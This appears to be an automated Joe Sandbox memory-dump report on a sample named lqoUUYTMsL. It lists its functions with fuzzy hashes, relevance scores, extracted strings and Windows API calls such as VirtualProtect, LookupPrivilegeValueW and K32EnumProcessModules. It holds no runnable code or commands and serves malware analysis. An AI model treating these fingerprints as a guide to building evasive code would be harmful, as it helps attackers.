Uniqueness

Uniqueness Score: -1.00%

Function 018B9028 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bad9eb7fdec71935583a44879b5237d78556e46941bfe1904abdb629473f08b2
Instruction ID: 04f80de2f5135dea1473ed122b65c5de5c995d5ff88ab8a9e522c929c8db35ec
Opcode Fuzzy Hash: bad9eb7fdec71935583a44879b5237d78556e46941bfe1904abdb629473f08b2
Instruction Fuzzy Hash: E991BDB4E05209DFDB04DFE9D585AEEBBF2FB89304F20842AD515AB314D7349A42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 056A9D48 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63776dc4f2ea6d78ab520ff5f0a5b59d1f60f9d82171334bdc8df579b3567d5d
Instruction ID: 43494f3ab76229953412a35b71fcd3a7ebcb2afa57250ae1e22cae41a1ca5e34
Opcode Fuzzy Hash: 63776dc4f2ea6d78ab520ff5f0a5b59d1f60f9d82171334bdc8df579b3567d5d
Instruction Fuzzy Hash: ED91D4B4D01218CFCF64DFA4E5886ADBBB2FF88305F24806AE909A7314DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 056A0006 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b19ee6568546d07ff08e7810fa3cc6451e86cd2e56ed647959ae73d4d79319ba
Instruction ID: e1c65143dc4154d69b71bf1bfbd75882c8e456245377e8807e8d621f1f347920
Opcode Fuzzy Hash: b19ee6568546d07ff08e7810fa3cc6451e86cd2e56ed647959ae73d4d79319ba
Instruction Fuzzy Hash: 61518BB1E057548FE719CF678C4079ABBF3AFC5210F19C1FA9448AA265EB740A85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 056A5840 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b3eb2c095baee34a194ff851f31246a6c9afd058a097a07400ec0dc14843757
Instruction ID: e3e676fe0c2b6adf2fb1eaf3b6c4a92415f9c2096438c5bfa95bb05e37b90dd0
Opcode Fuzzy Hash: 4b3eb2c095baee34a194ff851f31246a6c9afd058a097a07400ec0dc14843757
Instruction Fuzzy Hash: 61512472D05219CFCB08CFA6C5445AEFBF2FF89210F14D16AD41AAB220D3359A42CF68

Uniqueness

Uniqueness Score: -1.00%

Function 018B3268 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c65111970e67698c143e26875d8add49edcfb46b7cffefbe2f45598c1dcbf8
Instruction ID: 3db9609c6eda99dd812972c5760fe759dc031180c6909295a29d13f204cea633
Opcode Fuzzy Hash: 14c65111970e67698c143e26875d8add49edcfb46b7cffefbe2f45598c1dcbf8
Instruction Fuzzy Hash: F5511074E042098BCB08CFAAD5846EEBBF2FB89305F14C16AD815AB354DB349A41CF65

Uniqueness

Uniqueness Score: -1.00%

Function 056A0070 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0ab67377ef6db6b37d1b7ac8786167222d601fee374c672d299573740579e0f
Instruction ID: a9ce2e08392d968242acfb41ccb53605d67d12e6fb3e1c2a02133e5f204f737a
Opcode Fuzzy Hash: f0ab67377ef6db6b37d1b7ac8786167222d601fee374c672d299573740579e0f
Instruction Fuzzy Hash: 0C415471E016189BEB6DCF6B9D4078EFAF7BFC8210F14C1BA954DAA214EB301A458F11

Uniqueness

Uniqueness Score: -1.00%

Function 018B0006 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67e43573581d266fab3b7b7057aead1b16b8144740f7d4997f112d2893a3bbff
Instruction ID: 1ce8dcebb676b73d0b700b5f56d5ccb35d3e51df19df59bfdecc0af8aacfed76
Opcode Fuzzy Hash: 67e43573581d266fab3b7b7057aead1b16b8144740f7d4997f112d2893a3bbff
Instruction Fuzzy Hash: 46315C71D0A7859FD71ACF76C84069ABFF3AFC6310F08C0BAD8449A266D7380946CB61

Uniqueness

Uniqueness Score: -1.00%

Function 018B3B80 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f730d3af4aa6b610c36433f66df0068f2fffc213fdb7b916b144d31c34f0b59
Instruction ID: a7ab151b2e61ec246fcba6c62544951c3fb110f1d39eafd86abb7eff55abec27
Opcode Fuzzy Hash: 3f730d3af4aa6b610c36433f66df0068f2fffc213fdb7b916b144d31c34f0b59
Instruction Fuzzy Hash: 1B310AB1E016188BDB19CFAAD8443DEFBF2AFC9310F14C06AD409AB264DB740A45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 018BA3B8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b73287aed386d33eec8a028fea185ded068a06a953a49a0c549e1148123993c
Instruction ID: 939ba75d324c2986319c4f5e9ce5d1d755c487bb440a0524f9fae846204e33d8
Opcode Fuzzy Hash: 8b73287aed386d33eec8a028fea185ded068a06a953a49a0c549e1148123993c
Instruction Fuzzy Hash: 732128B1E016188BEB18CF9AD8443DEFBF2EFC8300F14C12AD809A6254DB340A55CF50

Uniqueness

Uniqueness Score: -1.00%

Function 018B0070 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f805394c5d59dd459bf6209103c0cb3e60a1faa12e9de09bc9d9dc08f61bd2f
Instruction ID: db5bc0f0cdacb2c8d3119879397ea0d348b8b78a8161fcbf6e7b4099a541c5d6
Opcode Fuzzy Hash: 9f805394c5d59dd459bf6209103c0cb3e60a1faa12e9de09bc9d9dc08f61bd2f
Instruction Fuzzy Hash: A611DD71E016189BEB1CCFABD9446DEFBF7AFC8311F14C57AD909A6214EB3016418B50

Uniqueness

Uniqueness Score: -1.00%

Function 056A1A13 Relevance: 3.8, Strings: 3, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

zo{N, xrefs: 056A1AAE
(, xrefs: 056A1A20
+&@*, xrefs: 056A1B32

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID: ($+&@*$zo{N
API String ID: 0-3792228825
Opcode ID: e280c4dcf3abb86b510969a7bf00d9fcf5b3186b1cadaa6fc2632e8205f2c1a1
Instruction ID: 6dec42302c2e2bf13b76f60707f2b7b9fb55cf3d86c158422c774c59881baa17
Opcode Fuzzy Hash: e280c4dcf3abb86b510969a7bf00d9fcf5b3186b1cadaa6fc2632e8205f2c1a1
Instruction Fuzzy Hash: CA21E474A05229CBDB69CF20C9847D9BBB2BB49300F1085EAD909A7750DB319F85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 056A150A Relevance: 2.5, Strings: 2, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xGYh, xrefs: 056A1575
2'l, xrefs: 056A1532

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID: xGYh$2'l
API String ID: 0-2529050898
Opcode ID: f5d6bc192c461d11474136c03887f71dc57fb4b0d041d940c3cd52981b40d426
Instruction ID: db83f9524375a8d4c035ec283fbd9b4febb9bde0c1d209048c31d52f53540b92
Opcode Fuzzy Hash: f5d6bc192c461d11474136c03887f71dc57fb4b0d041d940c3cd52981b40d426
Instruction Fuzzy Hash: C1F0DA30A522198FCB65DB31C8557AEB3BAAF86204F5094E9840D6F744CE35AEC5CF05

Uniqueness

Uniqueness Score: -1.00%

Function 012DAF58 Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetExitCodeProcess.KERNELBASE(?,00000E24,EDA1188D,00000000,00000000,00000000,00000000), ref: 012DB014

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 1caf4405f430dd64e2854c65143e606e9b1374c36716e9ca8e7d3457ce556a99
Instruction ID: 676782c3bd359e8e914a65deb27fde8837716275bab47a02813073422104b53e
Opcode Fuzzy Hash: 1caf4405f430dd64e2854c65143e606e9b1374c36716e9ca8e7d3457ce556a99
Instruction Fuzzy Hash: 2F315DB550E3C06FE7138B208C65B95BFB8AF47210F0984D7E984CF5A3D269A948C772

Uniqueness

Uniqueness Score: -1.00%

Function 012DABEC Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32EnumProcessModules.KERNEL32(?,00000E24,EDA1188D,00000000,00000000,00000000,00000000), ref: 012DAC86

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 5b24e97fa186b49e835d2645e1020d293f6fc44936d14529bca159a1cb1c83b5
Instruction ID: 33d187ab7641bfba377a6afa3c31f0f4d0aa4065d2e2d7e29078db031503843c
Opcode Fuzzy Hash: 5b24e97fa186b49e835d2645e1020d293f6fc44936d14529bca159a1cb1c83b5
Instruction Fuzzy Hash: 2121D5B65053806FE7128F60DC45F96BFB8EF06324F0884DAE985CF193D224A909CB75

Uniqueness

Uniqueness Score: -1.00%

Function 012DACE5 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32GetModuleInformation.KERNEL32(?,00000E24,EDA1188D,00000000,00000000,00000000,00000000), ref: 012DAD76

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: c48112fdf469b028a0b242025ddedd445a69740e6a5a6d817fe9425bf67cdd6f
Instruction ID: 5c8700c8a36fc565ff0d7c653c5af022fe5df5abadd9fdf79ee357f31b660b62
Opcode Fuzzy Hash: c48112fdf469b028a0b242025ddedd445a69740e6a5a6d817fe9425bf67cdd6f
Instruction Fuzzy Hash: 5221B5715053806FE722CF55CC44FA6BFBCEF46220F08849AE985CB292D364E948CB71

Uniqueness

Uniqueness Score: -1.00%

Function 012DADDC Relevance: 1.6, APIs: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 012DAE82

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 7626520139d8f84472774f1319e8012b25fac1767f623d7230fe15768b43321e
Instruction ID: 4204bc33eb5367266123436f06160424bc99203e20b1c4238011a9eb5960f921
Opcode Fuzzy Hash: 7626520139d8f84472774f1319e8012b25fac1767f623d7230fe15768b43321e
Instruction Fuzzy Hash: 1A21BF715093C06FD312CB65CC55B66BFB8EF87210F0984DBD884DB6A3D624A909C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 012DA1F4 Relevance: 1.6, APIs: 1, Instructions: 71
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 012DA275

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d48735b8f8ddbe58b1a0c9ddeabb93d5ac852d466d96149653d753b5f56aed86
Instruction ID: 0087415342ebb9b4f23b1a2ec853813ff73bca1e59d23e9c90e202c5149f3aaa
Opcode Fuzzy Hash: d48735b8f8ddbe58b1a0c9ddeabb93d5ac852d466d96149653d753b5f56aed86
Instruction Fuzzy Hash: 2E21BE3540D3C09FD7238B25CC54A92BFB4EF07220F0985DBD985CB5A3D229A808DB62

Uniqueness

Uniqueness Score: -1.00%

Function 012DAA4C Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 012DAAB8

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ede82a77692194bcfe7d36273948c8a3560fb483f40da96f0f0e98c73c7a4d1a
Instruction ID: 35d9dd99b6504e54e0c2b990d6bd1a2472f94fa935571fbaf4a849e70a75ab77
Opcode Fuzzy Hash: ede82a77692194bcfe7d36273948c8a3560fb483f40da96f0f0e98c73c7a4d1a
Instruction Fuzzy Hash: 7121C3725093C05FDB128F25DC54B92BFB4AF47324F0984DAE9C58F6A3D2649908CB72

Uniqueness

Uniqueness Score: -1.00%

Function 012DAD12 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E24,EDA1188D,00000000,00000000,00000000,00000000), ref: 012DAD76

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: f8c03e7bf61acc87c82f6d886099364b15e1117b3fa702ba31c1afa4bfd158de
Instruction ID: c11a98cb47881fa8000e347b307d62d0f1b047b4ff447ec800121a97c1468f5f
Opcode Fuzzy Hash: f8c03e7bf61acc87c82f6d886099364b15e1117b3fa702ba31c1afa4bfd158de
Instruction Fuzzy Hash: F8118175600240AFEB21CF55DC85FAABBE8EF04224F08846AED45CB695D774E9088BB5

Uniqueness

Uniqueness Score: -1.00%

Function 012DA773 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 012DA7E2

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: fd6c9a07ad25d94417e6c4bcdce5ec1f77eed5c2befa5848eb773465d8f4f055
Instruction ID: b9292d28a3fc7364c5bc39b9fbcfb25a0fbb1759d9073610a386e63d91d9263b
Opcode Fuzzy Hash: fd6c9a07ad25d94417e6c4bcdce5ec1f77eed5c2befa5848eb773465d8f4f055
Instruction Fuzzy Hash: 3A2172716053805FEB22CF29DC44F66BFF8EF46620F0884AAED85CB652D225E804CB71

Uniqueness

Uniqueness Score: -1.00%

Function 012DAC2A Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E24,EDA1188D,00000000,00000000,00000000,00000000), ref: 012DAC86

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 0415d940d7c6bb84b7675f30f9e7029194f2b395b9f9dd253a0add4a7ecd7edf
Instruction ID: a9ff27cacd8c9f52e2873416c422c2936dac25fd1082966be91a001455e0343e
Opcode Fuzzy Hash: 0415d940d7c6bb84b7675f30f9e7029194f2b395b9f9dd253a0add4a7ecd7edf
Instruction Fuzzy Hash: 0111C471600240AFEB21CF55DC45FAAFBE8EF44324F08846AED45CB651D374E9088BB6

Uniqueness

Uniqueness Score: -1.00%

Function 012DAFBE Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNELBASE(?,00000E24,EDA1188D,00000000,00000000,00000000,00000000), ref: 012DB014

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 4efbf231829cc32139c75af7b80720c747cd1c9ae60918257b5bb615276d27d8
Instruction ID: 111d2b449a52d1d1f2f5b7e9aac708c1cb7e7cb8d9627097e77cb835fdb9348f
Opcode Fuzzy Hash: 4efbf231829cc32139c75af7b80720c747cd1c9ae60918257b5bb615276d27d8
Instruction Fuzzy Hash: F311E371600240AFEB21CF15DC45BAABBD8EF05224F0884AAED44CB681D774E9088BB5

Uniqueness

Uniqueness Score: -1.00%

Function 012DA63C Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 012DA690

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 70fa1141321ced256d0dc85ad7c2f05d794075037c539502bfd365e2cdeee3c1
Instruction ID: 03466fe291f0b1e262784984ac361b173321ac2eafe5dd4bda554cac52dba047
Opcode Fuzzy Hash: 70fa1141321ced256d0dc85ad7c2f05d794075037c539502bfd365e2cdeee3c1
Instruction Fuzzy Hash: 801191755093809FDB128F25DC94B52BFA8DF46220F0884EBED858B657D275A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 012DA79A Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 012DA7E2

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 8f32f02c8cfee8cba8eeb98f409d109d5b8915603701c60ec83b57087a781853
Instruction ID: 9580d7baa3c7be668b145238d1311cbbf957509f3136b52053b6a6c39ac9fd1a
Opcode Fuzzy Hash: 8f32f02c8cfee8cba8eeb98f409d109d5b8915603701c60ec83b57087a781853
Instruction Fuzzy Hash: 9F1165726102419FEB14CF69DC85B6AFBE8EF04620F08C4AADD46CB792D374D504CA71

Uniqueness

Uniqueness Score: -1.00%

Function 012DA430 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 012DA484

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 1b6be3158577754994e01d678d3ce8f6d15e08462ee70da2f5d2dc1e7bc03ec1
Instruction ID: 34d29893f02c43cf284ae94d9a7b2090fd30fb82f5cd598d938b60fbf2eb2917
Opcode Fuzzy Hash: 1b6be3158577754994e01d678d3ce8f6d15e08462ee70da2f5d2dc1e7bc03ec1
Instruction Fuzzy Hash: E41184754093C4AFD7228F15DC48B62FFB8DF46624F0880DAED858B653D275A908DB72

Uniqueness

Uniqueness Score: -1.00%

Function 012DAE32 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 012DAE82

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 3f02b3d110fdaf7bbf7dcbef9d9f6c40a6bf8629f0a25dae79f3052cc8e96afa
Instruction ID: 4320c029ae8fff4344d594c906daf6bc84d9384382127b1c1684e727cf1a75dc
Opcode Fuzzy Hash: 3f02b3d110fdaf7bbf7dcbef9d9f6c40a6bf8629f0a25dae79f3052cc8e96afa
Instruction Fuzzy Hash: 51017171600200ABD314DF16DC45B7AFBE8FB88A20F14855AED489BB41D735B915CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 012DAA86 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 012DAAB8

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 1ee7d5c2059ef8e7fedc07e1aa922db75decd053033019a35baebefcd03ff4ee
Instruction ID: 025c09675c55182436e6a93a6729fb2ab806324f7d14026ea890e87caa5be15e
Opcode Fuzzy Hash: 1ee7d5c2059ef8e7fedc07e1aa922db75decd053033019a35baebefcd03ff4ee
Instruction Fuzzy Hash: 3A01D4716002408FDB10CF19D985B66FBE4EF44220F08C5AADD498B652D2B4E448CB72

Uniqueness

Uniqueness Score: -1.00%

Function 012DA65E Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 012DA690

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 3b270373b3304e9a40b815b2c19ba7620c782600ce099b93ddf3ba67aac81786
Instruction ID: b0c5acc3833111102c248ca943594b8fd20fd849c7b2b00fc0036436f1ddf137
Opcode Fuzzy Hash: 3b270373b3304e9a40b815b2c19ba7620c782600ce099b93ddf3ba67aac81786
Instruction Fuzzy Hash: 5701DF71600240CFEB10CF59D885B66FBE4EF44220F08C4AADD498B656D2B4E408CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 012DA23A Relevance: 1.5, APIs: 1, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 012DA275

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ff7df494aa7b1fd9716ad6f2b3eaf1b1238460f80c56e54db62b65dd44f763b4
Instruction ID: 00273da706465360c081435d8717f3e8b60ea43429464d8618928e85c0075e0b
Opcode Fuzzy Hash: ff7df494aa7b1fd9716ad6f2b3eaf1b1238460f80c56e54db62b65dd44f763b4
Instruction Fuzzy Hash: 9601D4755142409FEB218F5AD889B65FFE4EF08320F08C0AADD464B652D376E418CF62

Uniqueness

Uniqueness Score: -1.00%

Function 012DA452 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 012DA484

Memory Dump Source

Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: fd34a2e79bd274a7f2e331e45e737bbb00e01f054d7fbc0613c9287ad4ef1da5
Instruction ID: a534a8a20ac4e7e6821dd41685c2b3f377cdea6bbc9f8aa0116a720ff26043bd
Opcode Fuzzy Hash: fd34a2e79bd274a7f2e331e45e737bbb00e01f054d7fbc0613c9287ad4ef1da5
Instruction Fuzzy Hash: 41F0AF755142809FDB20CF05D88AB66FFE4EF04228F08C1AADD494B752D3B9A408CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 05662760 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

ILc, xrefs: 056627D4

Memory Dump Source

Source File: 00000000.00000002.1656066500.0000000005660000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: true

Associated: 00000000.00000002.1655933278.0000000005600000.00000004.08000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655933278.000000000565D000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5600000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID: ILc
API String ID: 0-871475565
Opcode ID: 075172f32d45c210fdddcc2e02e100c961fdb29103d1bca4fed9412a9586a385
Instruction ID: 4611cf3c75eecee65f3cdf689f251b7e796ca2af61729310c00c83f5886fe15d
Opcode Fuzzy Hash: 075172f32d45c210fdddcc2e02e100c961fdb29103d1bca4fed9412a9586a385
Instruction Fuzzy Hash: 8F51CFB8E04209DFCB44CFA5D9949EEBBB2FB48310F10952AE815AB354D730AA46CF51

Uniqueness

Uniqueness Score: -1.00%

